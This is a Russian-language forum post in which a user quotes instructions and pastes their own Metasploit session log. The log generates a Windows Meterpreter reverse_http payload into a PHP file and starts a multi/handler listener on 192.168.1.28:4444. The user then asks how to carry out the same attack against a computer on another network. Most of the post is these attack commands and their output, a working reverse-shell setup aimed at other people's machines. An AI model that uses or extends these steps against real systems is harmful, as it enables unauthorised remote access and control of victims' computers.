
13.01.2016, 14:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 8563
Репутация:
0
|
|
Сообщение от YaBtr
YaBtr said:
↑
Генерируете нагрузку, например, таким образом:
Код:
Code:
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
...
generate -f ololo.php -t raw
Соединение принимаете следующим образом:
Код:
Code:
msf payload(reverse_tcp) > use exploit/multi/handler
...
run
Информации по метасплоиту полно в интернете.
Код:
Code:
msf exploit(handler) > use exploit/multi/handlerInterrupt: use the 'exit' command to quit
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
msf payload(reverse_http) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf payload(reverse_http) > set LPORT 4444
LPORT => 4444
msf payload(reverse_http) > generate -f ololo.php -t raw[*] Writing 324 bytes to ololo.php...
msf payload(reverse_http) > use exploit/multi/handler
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.1.28:4444[*] Starting the payload handler...
???
Всё тоже самое нужно повторить с атакой на компьютер в другой сети.
Как понимаю для этого используется другой Еxploit.
Наведите на путь истинный.
|
|
|
|